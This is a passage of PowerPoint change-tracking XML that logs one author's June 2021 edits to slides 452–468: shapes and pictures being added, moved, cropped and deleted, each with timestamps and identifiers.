          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:35:13.592" v="1247" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3213363844" sldId="452"/>
            <ac:spMk id="13" creationId="{58044E78-D134-4A4A-BC87-2980D631A5FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:23:19.867" v="839" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3213363844" sldId="452"/>
            <ac:picMk id="6" creationId="{5900B614-FDB5-43E7-B778-CC974E254BCC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:33:53.115" v="1152" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3213363844" sldId="452"/>
            <ac:picMk id="9" creationId="{87F047EB-062B-4EC2-B491-F60F45689EC4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:33:22.690" v="1150" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3213363844" sldId="452"/>
            <ac:picMk id="11" creationId="{2112431A-9E08-41F2-9066-2C399D1C2FE9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:10.084" v="843" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2133232827" sldId="453"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:52:11.091" v="844" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4056873346" sldId="454"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:34:20.457" v="716" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="855798641" sldId="455"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:32:15.507" v="709" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="855798641" sldId="455"/>
            <ac:spMk id="2" creationId="{9E82A890-57B6-4DFA-929A-AE449FC9BABA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:34:20.457" v="716" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="855798641" sldId="455"/>
            <ac:spMk id="6" creationId="{E697AA09-D0C7-4AD3-AF69-A073945B6CFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:08:04.237" v="614" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="855798641" sldId="455"/>
            <ac:picMk id="4" creationId="{00552C3E-CC0A-47E4-B981-B93BE117E855}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:28:42.844" v="677" actId="22"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3068364558" sldId="456"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:27:37.485" v="676" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068364558" sldId="456"/>
            <ac:spMk id="2" creationId="{14F70D15-2304-4180-AB57-7ED2ED4CE24E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:28:42.844" v="677" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068364558" sldId="456"/>
            <ac:picMk id="4" creationId="{AA6CBCC3-0B20-4F74-9E49-25F3BAAF2D33}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:48:37.777" v="760" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="565360195" sldId="457"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:47:51.472" v="724" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565360195" sldId="457"/>
            <ac:spMk id="2" creationId="{BF28ECA6-3840-4009-A703-98C1FDA9D388}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:48:37.777" v="760" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565360195" sldId="457"/>
            <ac:spMk id="5" creationId="{CFE08556-FFBB-4950-9906-6CE885483EC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T20:48:13.244" v="728" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565360195" sldId="457"/>
            <ac:picMk id="4" creationId="{53142943-7D23-400D-9B1A-4677A16CB443}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:16:11.638" v="789" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="813736797" sldId="458"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod setBg">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:19:19.809" v="792" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2399777802" sldId="458"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:19:19.809" v="792" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2399777802" sldId="458"/>
            <ac:spMk id="8" creationId="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:19:19.809" v="792" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2399777802" sldId="458"/>
            <ac:picMk id="3" creationId="{857440CF-B990-4288-9B6B-5E7C6758964E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:09.035" v="1424" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="783190951" sldId="459"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:51:09.746" v="1305" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="783190951" sldId="459"/>
            <ac:spMk id="2" creationId="{EAF92C95-538B-4A08-B4E6-4CB98BB80680}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:56:09.035" v="1424" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="783190951" sldId="459"/>
            <ac:spMk id="4" creationId="{035D489E-10E1-4BC8-9FA1-376264A39956}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:51:28.602" v="1311" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="783190951" sldId="459"/>
            <ac:picMk id="3" creationId="{9663A687-8D1B-4875-BFDA-8ADD27650C20}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:16:10.606" v="788" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="810373971" sldId="459"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:11:04.980" v="785" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="810373971" sldId="459"/>
            <ac:spMk id="2" creationId="{B6B2932E-5693-43C9-BCCF-C1A42A1525F1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:05:40.720" v="981" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3533845808" sldId="460"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T21:59:31.929" v="865" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3533845808" sldId="460"/>
            <ac:spMk id="2" creationId="{20822149-A8A6-405F-A4D2-20AD826B0EC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:05:40.720" v="981" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3533845808" sldId="460"/>
            <ac:spMk id="5" creationId="{16551341-F4CD-434D-B699-D48DA8E762F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:00:53.829" v="867" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3533845808" sldId="460"/>
            <ac:picMk id="4" creationId="{B8DE6145-3CB8-4774-959D-5459D1B981AE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T00:54:35.641" v="1502"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="982174642" sldId="461"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:14:27.453" v="1082" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="982174642" sldId="461"/>
            <ac:spMk id="2" creationId="{DC466536-78F7-43B6-9E92-08FC8B66881D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:13:01.456" v="1079" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="982174642" sldId="461"/>
            <ac:picMk id="4" creationId="{7DE13BE4-50DC-42BD-89BA-B3BDF22E2D16}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:31:55.936" v="1123" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="982174642" sldId="461"/>
            <ac:picMk id="6" creationId="{4D6B606E-A002-43A4-BA6E-C0D01FC88E0B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:19:05.254" v="1122" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926730047" sldId="462"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:17:45.032" v="1088" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="926730047" sldId="462"/>
            <ac:spMk id="2" creationId="{918AB4F5-8300-4D7C-92D3-C9E1975DF222}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:17:45.032" v="1088" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="926730047" sldId="462"/>
            <ac:spMk id="3" creationId="{A4423BE6-D1D4-4122-ADCD-E42E4E2E9941}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:18:09.964" v="1118" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="926730047" sldId="462"/>
            <ac:spMk id="4" creationId="{5E2D5774-5837-4C41-A0B8-979FDAEC4639}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:19:05.254" v="1122" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="926730047" sldId="462"/>
            <ac:picMk id="6" creationId="{2BC507A4-8C0E-48D0-8A5A-8BFCA8B3D3C9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:47:16.314" v="1298" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2128572627" sldId="463"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:45:18.446" v="1253" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128572627" sldId="463"/>
            <ac:spMk id="2" creationId="{F5393399-7A58-4CF2-9972-504DBD191D87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:47:16.314" v="1298" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128572627" sldId="463"/>
            <ac:spMk id="5" creationId="{A4873511-F5D4-40D9-9ACD-D7A57A80B023}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-27T22:46:31.022" v="1258" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128572627" sldId="463"/>
            <ac:picMk id="4" creationId="{FDF8AEB8-4624-416A-9BA5-4FE710C26B16}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:07:26.884" v="1892" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3901806330" sldId="464"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:04:17.610" v="1716" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:spMk id="2" creationId="{9A83D4E1-9F76-4A05-9759-D484EE0B4F54}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:05:49.502" v="1830"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:spMk id="7" creationId="{9989392B-560F-4C54-9385-0014F4E255AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:07:00.545" v="1888" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:spMk id="8" creationId="{AA7D7F13-03FC-4EC4-9428-27D5E276621C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:02:30.521" v="1607" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:picMk id="4" creationId="{FA91B05F-C082-45A3-BBF7-7EC14F583300}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:06:57.566" v="1887" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:picMk id="6" creationId="{AA014166-9547-414F-8ED8-9B3752D61FEB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:07:26.884" v="1892" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3901806330" sldId="464"/>
            <ac:picMk id="10" creationId="{C843563E-1189-4CFB-85C3-054524EFEA34}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:00:52.883" v="1588" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1673180284" sldId="465"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T00:48:28.560" v="1497" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1673180284" sldId="465"/>
            <ac:spMk id="2" creationId="{35886C5E-F559-434C-8569-D7985BB6B5C0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:00:52.883" v="1588" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1673180284" sldId="465"/>
            <ac:spMk id="5" creationId="{9EA05D13-BD3B-4BAD-A54B-F0420A99B37F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T00:50:38.406" v="1500" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1673180284" sldId="465"/>
            <ac:picMk id="4" creationId="{78DEB2C5-89F6-4E83-B749-C45C95085A75}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:51:19.785" v="2404" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="369337190" sldId="466"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T00:55:38.502" v="1509" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="369337190" sldId="466"/>
            <ac:spMk id="2" creationId="{56AA07CA-B319-41D0-B8A7-8303275CAF5D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:51:19.785" v="2404" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="369337190" sldId="466"/>
            <ac:spMk id="3" creationId="{BA221579-6CF5-449F-B054-03A194D4F7B6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T00:55:38.502" v="1509" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="369337190" sldId="466"/>
            <ac:spMk id="4" creationId="{7EC1785D-911F-4C9D-BA71-488C434D7580}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:50:07.307" v="1986" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3568816338" sldId="467"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:20:05.953" v="1906" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1544977207" sldId="468"/>
        </pc:sldMkLst>
